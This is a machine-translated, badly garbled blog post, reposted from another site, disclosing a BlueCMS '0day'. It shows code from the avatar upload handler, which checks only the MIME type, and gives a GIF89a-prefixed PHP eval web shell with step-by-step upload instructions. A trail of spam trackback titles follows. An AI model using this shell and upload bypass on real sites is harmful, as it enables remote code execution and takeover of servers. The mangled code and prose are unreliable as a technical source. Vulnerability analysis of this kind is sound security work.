RSS

bluecms 0 días

Esta entrada foi publicada o 7 de outubro de 2009

: St0p
Reproducido por Escriba aquí a fonte: http://www.st0p.org

Nota: Sentímolo, a versión do cabelo de mañá á noite se chama dobre para o xornal un 0day, informado, e só ir ao oficial mirou, e lanzou un parche de seguridade pronto ah .. pode ir en liña non unha versión actualizada da proba ...

Desafortunadamente, o grupo Un amigo meu fixo un CMS, dixo que os datos do usuario para modificar algúns poden ser inxectado, dixo que a análise, coa localmente instalado despois, non pode usar comiñas simples son magic_quotes_gpc = off. . .

Vexa liña include / common.inc.php, renuncia. .

  A
 2
 3
 4
 5
 6
 7
 8
 9
  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST Deep_addslashes = ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; R $ _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; R $ _REQUEST = Deep_addslashes ($ _REQUEST);
  }
 ...... 

Quizais St0p boa sorte, ver subir fotos de pezas, análise de código, usa algo que se atopa en user.php. .

  A
 2
 3
 4
 5
 6
  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'include / upload.class.php'); / / chama a clase de carga
     new upload ( ) ; $ Imaxe = new a carga ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ Imaxe = $ Face_pic -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Non detectou sufixo directamente, a clase poderá pasar SHELL
	 } 

Abre as inclúen / upload.class.php só para detectar a cabeceira do arquivo non detecta o sufixo

  A
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
  ......
 a clase de subida {
	 = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; private $ allow_image_type = array ("image / jpg ',' image / gif ',' image / png ',' image / pjpeg ');
 ......
     $file , $dir = '' , $imgname = '' ) { img_upload función ($ ficheiro, $ dir ='', $ imgName ='') {
    	 empty ( $dir ) ) { if (empty ($ dir)) {
    		 BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; $ Dir = Data BLUE_ROOT de carga de datos ("YM") "/" ....;
    	 { Else {}
    		 BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; ... $ Dir = BLUE_ROOT de carga de datos $ Dir "/".;
    	 }

    	 ! file_exists ( $dir ) ) { if (! file_exists ($ dir)) {
    		 ! mkdir ( $dir ) ) { if (! mkdir ($ dir)) {
    			 ) ; showmsg ('o proceso de subida puido crear directorio ");
    		 }
    	 }
    	 empty ( $imgname ) ) { if (empty ($ imgName)) {
    		 $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; ImgName $ = $ this -> create_tempname () $ this -> get_type ($ ficheiro ['name']).;
    	 }
    	 $dir . $imgname ; ImgName $ = $ dir $ imgName.;
    	 ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { if (in_array ($ ficheiro ['type'], $ this -> allow_image_type)) {
              / / Só para detectar a cabeceira do ficheiro para a fronte, entón nós directamente como construír un SHELL
    		 ) ; showmsg ('non permite o tipo de imaxe');
    	 }


     } 

Os save enriba para st0p.php

  A
 2
  GIF89a
 ( $_POST [ st0p ] ) ; ?> <Php Eval ($ _POST [St0p]);?> 

Nota Rede conta de usuario membro -> meu perfil, entón facer a carga da nova imaxe para a elección construímos un ficheiro PHP, punto para confirmar modificar, ver a dirección se consegue, botón dereito do rato sobre a imaxe directamente en liña. . SHELL palabra enviada con éxito!

bluecms-0day1

bluecms-0day2

A análise está rematada, espero que máis cambios, a cuestión destas cousas só quero atopar algúns amigos para discutir tecnoloxía, creou un grupo tan ben, só un grupo común, só 100 persoas, limpar, nunca falan foi mal cargado B caos T, deprimido, grupo aberto é o intercambio, non falan foi espazo reservado no lugar, queren progreso, estrada lonxe non pode ir!
Para o grupo só para obter os resultados das discusións doutros doutros, non sei a pagar, ou só vir mergullo, ou sen. . .

Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


74 Responses to "bluecms 0 días"

  1. Ja, verjetno zato je


  1. 73 Trackback (s)

  2. principiantes Guía Lapis, Deseño
  3. o taxi Boston
  4. Xardineiros dentro Crouch End N8
  5. xardineiros paisaxistas Londres
  6. Ebook
  7. tecnoloxía definitiva supercubeï ¿ ½ 6000
  8. Nutrición Deportiva
  9. Whatman, dedais de extracción
  10. Tiu 1
  11. portarollo
  12. antykwariaty
  13. ï »¿ Garantía Servizos Alfa,
  14. Servizos de garantía Alpha
  15. previsións NBA
  16. Manistee fotógrafo de matrimonio
  17. WOF Christchurch
  18. vídeos pornográficos gratuítos para
  19. camiseta fisiculturismo
  20. o odds NFL
  21. Onde apostar Super Bowl 46
  22. lesión nas costas
  23. clasificados gratis
  24. St George Chiropractor
  25. os videntes uk
  26. apostas deportivas
  27. Phlebotomy Técnico
  28. obras de reposición Mazda
  29. cerraxeiro coche en Port Richmond, NY
  30. agustus
  31. trycholog Gdynia
  32. cupóns de cambio de aceite
  33. top asiático deportivas
  34. Bobby Donald pouco de pato abonnement
  35. Auckland drainlayer
  36. a luz psíquica
  37. Elektrik
  38. o asistente de fisioterapia
  39. mundo campistas
  40. os médiuns
  41. Abdel-Malik
  42. nz casas
  43. balance do golf axuda
  44. ebanistería Auckland
  45. lecturas psíquicas
  46. noite galiñas
  47. Aboubakar
  48. xogos online
  49. Alisson
  50. NBA Picks
  51. o chat libre psíquico
  52. seguridade portas nz
  53. tendas de sendeirismo
  54. casas de repouso Pol Auckland
  55. Surveyors Auckland
  56. peixe en liña na tenda
  57. Ares, Free Download
  58. Szkoła jazdy Gdynia opinie
  59. antykwariaty
  60. Blinds
  61. Batidas gratis por Dre
  62. Os paquetes de Fidxi
  63. Sitio web Marketing
  64. treehouses
  65. Illamento dinámico
  66. de tatuaxes tribo
  67. Valoración SEO Services,
  68. Xestión da cadea de subministración do curso,
  69. CIA Test prepara
  70. ventás Auckland
  71. Chanel, reloxos
  72. presupostos de seguro automóbil
  73. enerxía solar
  74. avaliación de empresas

Ten que estar logueado para escribir un comentario.